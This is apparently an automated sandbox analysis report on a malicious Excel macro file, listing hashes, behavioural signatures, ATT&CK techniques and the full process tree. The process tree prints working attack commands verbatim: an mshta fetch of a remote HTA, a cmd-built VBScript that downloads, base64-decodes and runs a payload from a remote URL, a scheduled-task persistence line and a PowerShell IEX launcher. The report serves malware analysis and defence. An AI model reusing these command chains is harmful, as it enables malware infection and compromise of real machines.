038214d4fc146d3a0b09db57ab584e3cef198a466d82206a03af0ca6aff4ac2e

General

Target

bb37e159_by_Libranalysis.xlsm
Size

15KB
MD5

bb37e1592a9611dc521167ac5a2034a2
SHA1

a9a1e60803fcb5a0b68659195ce5d0c15455646b
SHA256

038214d4fc146d3a0b09db57ab584e3cef198a466d82206a03af0ca6aff4ac2e
SHA512

ddfa6ba01694e9a9e7355cb4ce2db69d3aaee908180a1bce066b382c02f5bf938bbd21240df7e0aa505fed64a440d420cecb11736e2855a3fee4589342b31a49

Score

10^/10

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://www.j.mp/jasidjalsdjlijlijasd

Signatures

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

mshta.exePowershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	3384	4032	mshta.exe	EXCEL.EXE
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5456	5204	Powershell.exe

Blocklisted process makes network request 15 IoCs

Processes:

mshta.exeWScript.exePowershell.exe

flow	pid	process
38	3384	mshta.exe
40	3384	mshta.exe
42	3384	mshta.exe
44	3384	mshta.exe
46	3384	mshta.exe
48	3384	mshta.exe
50	3384	mshta.exe
53	3384	mshta.exe
55	5156	WScript.exe
57	5156	WScript.exe
58	3384	mshta.exe
61	3384	mshta.exe
64	3384	mshta.exe
65	3384	mshta.exe
69	5456	Powershell.exe

Executes dropped EXE 1 IoCs

Processes:

lulupupugugugagachuchui.txt

pid process

5736 lulupupugugugagachuchui.txt
Drops startup file 1 IoCs

Processes:

aspnet_compiler.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk aspnet_compiler.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

Powershell.exe

description pid process target process

PID 5456 set thread context of 5996 5456 Powershell.exe aspnet_compiler.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

5864 3384 WerFault.exe mshta.exe

pid	process
5736	lulupupugugugagachuchui.txt

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk	aspnet_compiler.exe

description	pid	process	target process
PID 5456 set thread context of 5996	5456	Powershell.exe	aspnet_compiler.exe

pid	pid_target	process	target process
5864	3384	WerFault.exe	mshta.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

5496 schtasks.exe

pid	process
5496	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Kills process with taskkill 26 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
4128	taskkill.exe
4208	taskkill.exe
4264	taskkill.exe
2832	taskkill.exe
4700	taskkill.exe
1072	taskkill.exe
4816	taskkill.exe
4760	taskkill.exe
3156	taskkill.exe
4328	taskkill.exe
1116	taskkill.exe
3772	taskkill.exe
2772	taskkill.exe
4160	taskkill.exe
648	taskkill.exe
3964	taskkill.exe
4480	taskkill.exe
4408	taskkill.exe
4528	taskkill.exe
4516	taskkill.exe
4632	taskkill.exe
4584	taskkill.exe
1496	taskkill.exe
2684	taskkill.exe
3032	taskkill.exe
3936	taskkill.exe

Modifies registry class 1 IoCs

Processes:

cmd.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings cmd.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

4032 EXCEL.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings	cmd.exe

pid	process
4032	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 32 IoCs

Processes:

Powershell.exeWerFault.exe

pid	process
5456	Powershell.exe
5456	Powershell.exe
5456	Powershell.exe
5456	Powershell.exe
5864	WerFault.exe
5864	WerFault.exe
5864	WerFault.exe
5864	WerFault.exe
5864	WerFault.exe
5864	WerFault.exe
5864	WerFault.exe
5864	WerFault.exe
5864	WerFault.exe
5864	WerFault.exe
5864	WerFault.exe
5864	WerFault.exe
5864	WerFault.exe
5864	WerFault.exe
5864	WerFault.exe
5864	WerFault.exe
5456	Powershell.exe
5456	Powershell.exe
5456	Powershell.exe
5456	Powershell.exe
5456	Powershell.exe
5456	Powershell.exe
5456	Powershell.exe
5456	Powershell.exe
5456	Powershell.exe
5456	Powershell.exe
5456	Powershell.exe
5456	Powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exePowershell.exe

description	pid	process
Token: SeDebugPrivilege	3156	taskkill.exe
Token: SeDebugPrivilege	1496	taskkill.exe
Token: SeDebugPrivilege	1072	taskkill.exe
Token: SeDebugPrivilege	3772	taskkill.exe
Token: SeDebugPrivilege	2772	taskkill.exe
Token: SeDebugPrivilege	2832	taskkill.exe
Token: SeDebugPrivilege	2684	taskkill.exe
Token: SeDebugPrivilege	3936	taskkill.exe
Token: SeDebugPrivilege	1116	taskkill.exe
Token: SeDebugPrivilege	3032	taskkill.exe
Token: SeDebugPrivilege	4128	taskkill.exe
Token: SeDebugPrivilege	4160	taskkill.exe
Token: SeDebugPrivilege	3964	taskkill.exe
Token: SeDebugPrivilege	648	taskkill.exe
Token: SeDebugPrivilege	4208	taskkill.exe
Token: SeDebugPrivilege	4328	taskkill.exe
Token: SeDebugPrivilege	4264	taskkill.exe
Token: SeDebugPrivilege	4480	taskkill.exe
Token: SeDebugPrivilege	4408	taskkill.exe
Token: SeDebugPrivilege	4528	taskkill.exe
Token: SeDebugPrivilege	4584	taskkill.exe
Token: SeDebugPrivilege	4516	taskkill.exe
Token: SeDebugPrivilege	4632	taskkill.exe
Token: SeDebugPrivilege	4700	taskkill.exe
Token: SeDebugPrivilege	4760	taskkill.exe
Token: SeDebugPrivilege	4816	taskkill.exe
Token: SeDebugPrivilege	5456	Powershell.exe
Token: SeIncreaseQuotaPrivilege	5456	Powershell.exe
Token: SeSecurityPrivilege	5456	Powershell.exe
Token: SeTakeOwnershipPrivilege	5456	Powershell.exe
Token: SeLoadDriverPrivilege	5456	Powershell.exe
Token: SeSystemProfilePrivilege	5456	Powershell.exe
Token: SeSystemtimePrivilege	5456	Powershell.exe
Token: SeProfSingleProcessPrivilege	5456	Powershell.exe
Token: SeIncBasePriorityPrivilege	5456	Powershell.exe
Token: SeCreatePagefilePrivilege	5456	Powershell.exe
Token: SeBackupPrivilege	5456	Powershell.exe
Token: SeRestorePrivilege	5456	Powershell.exe
Token: SeShutdownPrivilege	5456	Powershell.exe
Token: SeDebugPrivilege	5456	Powershell.exe
Token: SeSystemEnvironmentPrivilege	5456	Powershell.exe
Token: SeRemoteShutdownPrivilege	5456	Powershell.exe
Token: SeUndockPrivilege	5456	Powershell.exe
Token: SeManageVolumePrivilege	5456	Powershell.exe
Token: 33	5456	Powershell.exe
Token: 34	5456	Powershell.exe
Token: 35	5456	Powershell.exe
Token: 36	5456	Powershell.exe
Token: SeIncreaseQuotaPrivilege	5456	Powershell.exe
Token: SeSecurityPrivilege	5456	Powershell.exe
Token: SeTakeOwnershipPrivilege	5456	Powershell.exe
Token: SeLoadDriverPrivilege	5456	Powershell.exe
Token: SeSystemProfilePrivilege	5456	Powershell.exe
Token: SeSystemtimePrivilege	5456	Powershell.exe
Token: SeProfSingleProcessPrivilege	5456	Powershell.exe
Token: SeIncBasePriorityPrivilege	5456	Powershell.exe
Token: SeCreatePagefilePrivilege	5456	Powershell.exe
Token: SeBackupPrivilege	5456	Powershell.exe
Token: SeRestorePrivilege	5456	Powershell.exe
Token: SeShutdownPrivilege	5456	Powershell.exe
Token: SeDebugPrivilege	5456	Powershell.exe
Token: SeSystemEnvironmentPrivilege	5456	Powershell.exe
Token: SeRemoteShutdownPrivilege	5456	Powershell.exe
Token: SeUndockPrivilege	5456	Powershell.exe

Suspicious use of SetWindowsHookEx 8 IoCs

Processes:

EXCEL.EXE

pid process

4032 EXCEL.EXE
4032 EXCEL.EXE
4032 EXCEL.EXE
4032 EXCEL.EXE
4032 EXCEL.EXE
4032 EXCEL.EXE
4032 EXCEL.EXE
4032 EXCEL.EXE

pid	process
4032	EXCEL.EXE
4032	EXCEL.EXE
4032	EXCEL.EXE
4032	EXCEL.EXE
4032	EXCEL.EXE
4032	EXCEL.EXE
4032	EXCEL.EXE
4032	EXCEL.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

EXCEL.EXEmshta.execmd.exeWScript.exePowershell.exe

description	pid	process	target process
PID 4032 wrote to memory of 3384	4032	EXCEL.EXE	mshta.exe
PID 4032 wrote to memory of 3384	4032	EXCEL.EXE	mshta.exe
PID 3384 wrote to memory of 1072	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 1072	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 3156	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 3156	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 3772	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 3772	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 2772	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 2772	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 1496	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 1496	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 2684	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 2684	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 2832	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 2832	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 3936	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 3936	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 3032	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 3032	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 1116	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 1116	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 3964	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 3964	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 648	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 648	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 4128	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 4128	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 4160	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 4160	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 4208	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 4208	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 4264	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 4264	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 4328	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 4328	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 4408	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 4408	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 4480	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 4480	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 4516	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 4516	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 4528	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 4528	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 4584	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 4584	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 4632	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 4632	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 4700	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 4700	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 4760	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 4760	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 4816	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 4816	3384	mshta.exe	taskkill.exe
PID 3384 wrote to memory of 4980	3384	mshta.exe	cmd.exe
PID 3384 wrote to memory of 4980	3384	mshta.exe	cmd.exe
PID 4980 wrote to memory of 5156	4980	cmd.exe	WScript.exe
PID 4980 wrote to memory of 5156	4980	cmd.exe	WScript.exe
PID 3384 wrote to memory of 5496	3384	mshta.exe	schtasks.exe
PID 3384 wrote to memory of 5496	3384	mshta.exe	schtasks.exe
PID 5156 wrote to memory of 5736	5156	WScript.exe	lulupupugugugagachuchui.txt
PID 5156 wrote to memory of 5736	5156	WScript.exe	lulupupugugugagachuchui.txt
PID 5156 wrote to memory of 5736	5156	WScript.exe	lulupupugugugagachuchui.txt
PID 5456 wrote to memory of 5948	5456	Powershell.exe	aspnet_compiler.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\bb37e159_by_Libranalysis.xlsm"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4032

C:\Windows\SYSTEM32\mshta.exe
"mshta""http://www.j.mp/jasidjalsdjlijlijasd"
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:3384

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im RegAsm.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3156

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im InstallUtil.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2772

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im aspnet_regbrowsers
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1496

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im cvtres.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2684

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im vbc.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3032

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im jsc.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4128

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im aspnet_regbrowsers
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4208

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im csc.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4160

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im csc.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:648

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im CasPol.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4328

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im RegAsm.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4264

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im cvtres.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3964

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im msbuild.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1116

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im jsc.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4480

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im vbc.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4408

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im CasPol.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3936

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im msbuild.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2832

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im RegSvcs.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4528

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im RegAsm.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4516

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im aspnet_regiis.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4632

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im aspnet_compiler.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4700

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im aspnet_compiler.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4584

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im RegAsm.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3772

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im InstallUtil.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1072

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c cd C:\Users\Public &@echo dim http_obj >>hulalalMCROSOFT.vbs &@echo dim stream_obj >>hulalalMCROSOFT.vbs &@echo dim shell_obj >>hulalalMCROSOFT.vbs &@echo set http_obj = CreateObject("Microsoft.XMLHTTP") >>hulalalMCROSOFT.vbs &@echo set stream_obj = CreateObject("ADODB.Stream") >>hulalalMCROSOFT.vbs &@echo set shell_obj = GetObject("new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B") >>hulalalMCROSOFT.vbs &@echo URL = "https://ia601506.us.archive.org/6/items/extobae64/newno.txt">>hulalalMCROSOFT.vbs &@echo http_obj.open "GET", URL, False >>hulalalMCROSOFT.vbs &@echo http_obj.send >>hulalalMCROSOFT.vbs &@echo stream_obj.type = 1 >>hulalalMCROSOFT.vbs &@echo stream_obj.open >>hulalalMCROSOFT.vbs &@echo stream_obj.write http_obj.responseBody >>hulalalMCROSOFT.vbs &@echo stream_obj.savetofile "C:\Users\Public\phutu.txt", 2 >>hulalalMCROSOFT.vbs &@echo Dim xxx >>hulalalMCROSOFT.vbs &@echo Set xxx = CreateObject("Scripting.FileSystemObject") >>hulalalMCROSOFT.vbs &@echo Set file = xxx.OpenTextFile("C:\Users\Public\phutu.txt", 1) >>hulalalMCROSOFT.vbs &@echo content = file.ReadAll >>hulalalMCROSOFT.vbs &@echo content = StrReverse(content) >>hulalalMCROSOFT.vbs &@echo Dim fso >>hulalalMCROSOFT.vbs &@echo Dim fdsafdsa >>hulalalMCROSOFT.vbs &@echo Dim oNode, fdsaa >>hulalalMCROSOFT.vbs &@echo Const adTypeBinary = 1 >>hulalalMCROSOFT.vbs &@echo Const adSaveCreateOverWrite = 2 >>hulalalMCROSOFT.vbs &@echo Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64") >>hulalalMCROSOFT.vbs &@echo oNode.dataType = "bin.base64">>hulalalMCROSOFT.vbs &@echo oNode.Text = content >>hulalalMCROSOFT.vbs &@echo Set fdsaa = CreateObject("ADODB.Stream") >>hulalalMCROSOFT.vbs &@echo fdsaa.Type = adTypeBinary >>hulalalMCROSOFT.vbs &@echo tempdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("C:\Users\Public\lulupupugugugagachuchui.txt") >>hulalalMCROSOFT.vbs &@echo LocalFile = tempdir >>hulalalMCROSOFT.vbs &@echo fdsaa.Open >>hulalalMCROSOFT.vbs &@echo fdsaa.Write oNode.nodeTypedValue >>hulalalMCROSOFT.vbs &@echo fdsaa.SaveToFile LocalFile, adSaveCreateOverWrite >>hulalalMCROSOFT.vbs &@echo Set fso = CreateObject("Scripting.FileSystemObject") >>hulalalMCROSOFT.vbs &@echo Set fdsafdsa = GetObject("new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B") >>hulalalMCROSOFT.vbs &@echo If (fso.FileExists(LocalFile)) Then >>hulalalMCROSOFT.vbs &@echo fdsafdsa.Exec (LocalFile) >>hulalalMCROSOFT.vbs &@echo End If >>hulalalMCROSOFT.vbs& hulalalMCROSOFT.vbs &dEl hulalalMCROSOFT.vbs
3⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4980

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\hulalalMCROSOFT.vbs"
4⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:5156

C:\Users\Public\lulupupugugugagachuchui.txt
C:\Users\Public\lulupupugugugagachuchui.txt
5⤵
- Executes dropped EXE
PID:5736

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im aspnet_regiis.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4816

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im RegSvcs.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4760

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta""\""http://1230948%[email protected]/p/50.html\"
3⤵
- Creates scheduled task(s)
PID:5496

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3384 -s 4352
3⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
PID:5864

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
Powershell -noexit ((gp HKCU:\Software).Phuphurupulugugu)|IEX
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5456

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
2⤵
PID:5948

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
2⤵
PID:5956

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
2⤵
PID:5964

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
2⤵
PID:5980

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
2⤵
PID:5972

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
2⤵
PID:5988

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
2⤵
- Drops startup file
PID:5996

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\hulalalMCROSOFT.vbs
MD5
048ebd17bb3df16f858bca5d4f78e20d

SHA1
9abd3a686392833edff2594c8d916992392cc48a

SHA256
2d57020695624dee4cf6a9043f10d95a53b755be6cf76c84aa992ef4f6948fc6

SHA512
5924356edbf646762c265d1cc7ad0541084dd5d3c14c5fc87c82bc7992233fb315df0462748dfde00e30d55d0f9a9ce7e2ee70bd21243cb27c21fc828c079d00

Download Submit
C:\Users\Public\lulupupugugugagachuchui.txt
MD5
c2ac3f940b60352931a31446a17525b1

SHA1
dcb39fd6962b8263fcd7c4cfd1187c224c654943

SHA256
64246eafb3187a5d814a9c1b55b61beda376eb2f3e8ec2c42988a1fafe0d5e6f

SHA512
e8ed300e95ddcec8539a6203d01aee8484ec82978931c90184039f5369f8bd9a4169dbece91bd5562ec736d01bf0f2252a1f4a7f1de9c7844ffb840acd0cb291

Download Submit
C:\Users\Public\lulupupugugugagachuchui.txt
MD5
c2ac3f940b60352931a31446a17525b1

SHA1
dcb39fd6962b8263fcd7c4cfd1187c224c654943

SHA256
64246eafb3187a5d814a9c1b55b61beda376eb2f3e8ec2c42988a1fafe0d5e6f

SHA512
e8ed300e95ddcec8539a6203d01aee8484ec82978931c90184039f5369f8bd9a4169dbece91bd5562ec736d01bf0f2252a1f4a7f1de9c7844ffb840acd0cb291

Download Submit
memory/648-192-0x0000000000000000-mapping.dmp

Download
memory/1072-182-0x0000000000000000-mapping.dmp

Download
memory/1116-190-0x0000000000000000-mapping.dmp

Download
memory/1496-185-0x0000000000000000-mapping.dmp

Download
memory/2684-186-0x0000000000000000-mapping.dmp

Download
memory/2772-184-0x0000000000000000-mapping.dmp

Download
memory/2832-187-0x0000000000000000-mapping.dmp

Download
memory/3032-189-0x0000000000000000-mapping.dmp

Download
memory/3156-181-0x0000000000000000-mapping.dmp

Download
memory/3384-179-0x0000000000000000-mapping.dmp

Download
memory/3772-183-0x0000000000000000-mapping.dmp

Download
memory/3936-188-0x0000000000000000-mapping.dmp

Download
memory/3964-191-0x0000000000000000-mapping.dmp

Download
memory/4032-121-0x00007FFD56030000-0x00007FFD5711E000-memory.dmp

Filesize
16.9MB

Download
memory/4032-116-0x00007FFD35790000-0x00007FFD357A0000-memory.dmp

Filesize
64KB

Download
memory/4032-115-0x00007FFD35790000-0x00007FFD357A0000-memory.dmp

Filesize
64KB

Download
memory/4032-180-0x000002CF9E760000-0x000002CF9E764000-memory.dmp

Filesize
16KB

Download
memory/4032-118-0x00007FFD35790000-0x00007FFD357A0000-memory.dmp

Filesize
64KB

Download
memory/4032-122-0x00007FFD35790000-0x00007FFD357A0000-memory.dmp

Filesize
64KB

Download
memory/4032-114-0x00007FF649AA0000-0x00007FF64D056000-memory.dmp

Filesize
53.7MB

Download
memory/4032-123-0x00007FFD53FA0000-0x00007FFD55E95000-memory.dmp

Filesize
31.0MB

Download
memory/4032-117-0x00007FFD35790000-0x00007FFD357A0000-memory.dmp

Filesize
64KB

Download
memory/4128-193-0x0000000000000000-mapping.dmp

Download
memory/4160-194-0x0000000000000000-mapping.dmp

Download
memory/4208-195-0x0000000000000000-mapping.dmp

Download
memory/4264-196-0x0000000000000000-mapping.dmp

Download
memory/4328-197-0x0000000000000000-mapping.dmp

Download
memory/4408-198-0x0000000000000000-mapping.dmp

Download
